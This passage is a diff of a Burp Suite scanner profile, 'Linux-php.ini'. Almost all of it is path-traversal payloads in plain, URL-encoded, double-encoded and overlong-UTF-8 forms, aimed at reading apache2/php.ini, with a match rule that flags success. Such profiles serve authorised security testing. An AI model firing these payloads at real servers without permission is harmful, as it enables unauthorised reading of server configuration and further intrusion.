%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,About php.ini"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-php.ini","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-php.ini","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"apache2/php.ini","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-php.ini",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
